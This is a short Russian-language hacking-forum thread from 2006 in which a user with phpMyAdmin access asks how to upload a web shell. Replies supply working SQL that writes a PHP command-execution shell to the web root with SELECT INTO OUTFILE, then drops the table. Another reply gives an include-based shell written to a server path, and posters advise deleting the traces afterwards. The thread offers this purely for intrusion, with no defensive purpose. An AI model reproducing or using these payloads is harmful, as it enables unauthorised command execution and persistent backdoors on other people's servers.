Sql запрос для php-myadmin

Discussion in 'Уязвимости' started by SanyaX, 12 Apr 2006.

  1. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Вообщем столкнулся с такой проблемой. Есть доступ к phpmyadmin но не знаю как залить шелл. Может кто подскажет??
     
  2. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    CREATE TABLE `shell` (s TEXT);
    INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
    SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
    DROP TABLE `shell`;
     
    2 people like this.
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Эх жалко не хватает прав....
     
  4. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Смотря на что прав не хватает, добавить строку можно к любой другой таблице. Только удалить ее не забудь потом. ;) А если на инто аутфайл или запись, то хуже уже...
     
    1 person likes this.
  5. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    На инто вот и нету записи.
     
  6. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
  7. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Может я тут не в тему, но всёравно подскажу...
    Сначало в phpMyAdmin надо куда-то вписать значение <? include($_GET[p]) ?> потом использовать команду SELECT pass INTO OUTFILE 'c:/appserv/www/appserv/user.php' FROM user WHERE login = 'shell'
    Думаю значение этого всего объяснять ненадо, вот только не помню как путь прописывать... /www/site/ или \www\site\